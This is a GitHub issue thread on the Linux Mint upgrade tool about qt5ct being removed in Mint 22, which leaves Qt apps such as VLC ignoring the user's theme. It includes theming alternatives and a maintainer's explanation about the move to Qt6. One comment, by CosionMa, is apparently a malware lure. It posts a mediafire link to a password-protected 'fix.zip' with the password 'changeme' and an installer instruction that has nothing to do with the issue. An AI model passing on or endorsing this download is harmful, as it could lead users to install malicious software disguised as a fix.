### ISSUE TITLE
Why is `qt5ct` removed on upgrade to Mint 22? (causes system theme not applied anymore to QT applications)

### ISSUE THREAD

**Issue by schorschii** [linuxmint/mintupgrade#110]
The removal of `qt5ct` causes QT applications to not be displayed in the theme set by the user. This includes the popular VLC media player and is especially annoying when using the dark mode. The qt5ct can be re-installed on Mint 22 without any issue. So why is it removed on the upgrade? @clefebvre ?

https://github.com/linuxmint/mintupgrade/blob/b9eb67680583aac6ed7145e7f1e4b199546d9c4f/usr/lib/linuxmint/mintupgrade/constants_mint.py#L56

Introduced with commit: https://github.com/linuxmint/mintupgrade/commit/f239cde908288b8c250f938e7311c7ffbc16bd59

After the upgrade without qt5ct:
![Bildschirmfoto vom 2024-08-26 15-47-46](https://github.com/user-attachments/assets/139133d3-468d-4ea0-b04d-6fefbc3c9f9b)

After installing qt5ct again:
![Bildschirmfoto vom 2024-08-26 15-44-30](https://github.com/user-attachments/assets/583b849d-480e-4011-b92b-1ecf183acd39)

---

If there is a reason why qt5ct is removed, there are other possibilities to achieve the system theme on QT applications:
- installing `qt5-gtk2-platformtheme` and set environment variable `QT_QPA_PLATFORMTHEME=gtk2`
- installing `qgnomeplatform-qt5` and set environment variable `QT_QPA_PLATFORMTHEME=gnome`

It would be nice to implement one of these possibilities to get a consistent look again over all applications.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by clefebvre** [comment]
Hi @schorschii,

Many of the apps in 22 moved to QT6 (qt6ct also is available there). Long term and as part of Xapp we want Qt to integrate better within our GTK desktops but short term it made little sense to ship with incomplete Qt6 support or to ship with Qt5ct and not Qt6ct. It's already a little bit weird for users to have this by default in their menu.. it's really something that should work ootb rather than for a configuration tool like this one to be provided.

The removal of qt5ct in the upgrade reflects the removal of it from the default selection for fresh installations.
